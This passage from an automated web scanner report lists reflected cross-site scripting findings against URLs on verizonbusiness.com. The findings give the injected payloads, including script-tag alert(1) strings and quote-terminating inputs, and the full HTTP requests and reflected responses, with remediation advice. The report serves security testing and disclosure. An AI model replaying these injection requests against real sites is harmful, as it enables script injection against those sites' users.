Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:14 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesf81e8";801cb894d35/1002a2a23-111-Wireless.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.639. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a23-111-Wireless.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 274f8</script><script>alert(1)</script>29480a809b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a23-111-Wireless.xml274f8</script><script>alert(1)</script>29480a809b3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "b742cd8b5792f12a55ff5c5a069588b4"
Last-Modified: Wed, 17 Nov 2010 00:29:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d2686429e-f8d7-4b59-9c71-6072a390b94c|VTID%3d815ea803-841e-4bf9-bc70-fe9fd258bc0f|SX%3d1289954952|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:32:56 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:29:12 GMT
Content-Length: 34377

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a23-111-Wireless.xml274f8</script><script>alert(1)</script>29480a809b3</url>
...[SNIP]...

1.640. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a23-111-Wireless.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba8fe'%3be6f9e0e806c was submitted in the REST URL parameter 2. This input was echoed as ba8fe';e6f9e0e806c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ba8fe'%3be6f9e0e806c HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ba8fe';e6f9e0e806c'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.641. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a24-111-Virtualization.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cea"%3b22920c2436d was submitted in the REST URL parameter 1. This input was echoed as 46cea";22920c2436d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources46cea"%3b22920c2436d/1002a2a24-111-Virtualization.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:26:03 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources46cea";22920c2436d/1002a2a24-111-Virtualization.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.642. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a24-111-Virtualization.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93063'%3bdadd5304446 was submitted in the REST URL parameter 1. This input was echoed as 93063';dadd5304446 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources93063'%3bdadd5304446/1002a2a24-111-Virtualization.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:25 GMT
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources93063';dadd5304446/1002a2a24-111-Virtualization.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.643. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a24-111-Virtualization.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d8a1</script><script>alert(1)</script>698c18b1574 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a24-111-Virtualization.xml5d8a1</script><script>alert(1)</script>698c18b1574 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "5d09d4ff91955cf1ccf7064df760b756"
Last-Modified: Wed, 17 Nov 2010 00:28:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:28:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d603d0da1-a2fd-40bd-8a42-d64dfc77c84d|VTID%3d4af64dde-f5c9-48a9-88d0-965b1ee21562|SX%3d1289954896|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:32:00 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:28:17 GMT
Content-Length: 33651

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a2a24-111-Virtualization.xml5d8a1</script><script>alert(1)</script>698c18b1574</url>
...[SNIP]...

1.644. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a24-111-Virtualization.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8b6a'%3b3f1fa6957bd was submitted in the REST URL parameter 2. This input was echoed as c8b6a';3f1fa6957bd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c8b6a'%3b3f1fa6957bd HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/c8b6a';3f1fa6957bd'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.645. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a25-111-Teleworking.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25d66'%3b64e63c95fa6 was submitted in the REST URL parameter 1. This input was echoed as 25d66';64e63c95fa6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources25d66'%3b64e63c95fa6/1002a2a25-111-Teleworking.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:25:05 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:25:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:25:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources25d66';64e63c95fa6/1002a2a25-111-Teleworking.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.646. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a25-111-Teleworking.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4207"%3b8eea3dce6e3 was submitted in the REST URL parameter 1. This input was echoed as d4207";8eea3dce6e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd4207"%3b8eea3dce6e3/1002a2a25-111-Teleworking.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesd4207";8eea3dce6e3/1002a2a25-111-Teleworking.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.647. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a25-111-Teleworking.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27a30</script><script>alert(1)</script>aa3a56b9f48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a25-111-Teleworking.xml27a30</script><script>alert(1)</script>aa3a56b9f48 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "9e57d9593727d102bfb5cd50ae5c5727"
Last-Modified: Wed, 17 Nov 2010 00:26:45 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d9c1229c9-e004-42a9-a53f-fd8eff439bfc|VTID%3d74edd7fc-8bdf-448a-aab7-1de8f33bfac7|SX%3d1289954805|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:29 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:45 GMT
Content-Length: 38077

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a25-111-Teleworking.xml27a30</script><script>alert(1)</script>aa3a56b9f48</url>
...[SNIP]...

1.648. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a25-111-Teleworking.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be3b3'%3b44449288b0d was submitted in the REST URL parameter 2. This input was echoed as be3b3';44449288b0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/be3b3'%3b44449288b0d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/be3b3';44449288b0d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.649. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a26-111-Executive+Leadership+Series.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89f69'%3bc2d3e04a530 was submitted in the REST URL parameter 1. This input was echoed as 89f69';c2d3e04a530 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources89f69'%3bc2d3e04a530/1002a2a26-111-Executive+Leadership+Series.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40692
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources89f69';c2d3e04a530/1002a2a26-111-Executive+Leadership+Series.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.650. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a26-111-Executive+Leadership+Series.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b59e5"%3b9bddfedbb20 was submitted in the REST URL parameter 1. This input was echoed as b59e5";9bddfedbb20 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb59e5"%3b9bddfedbb20/1002a2a26-111-Executive+Leadership+Series.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40692
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb59e5";9bddfedbb20/1002a2a26-111-Executive+Leadership+Series.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDA
...[SNIP]...

1.651. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a26-111-Executive+Leadership+Series.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d635</script><script>alert(1)</script>95f4b5f9926 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

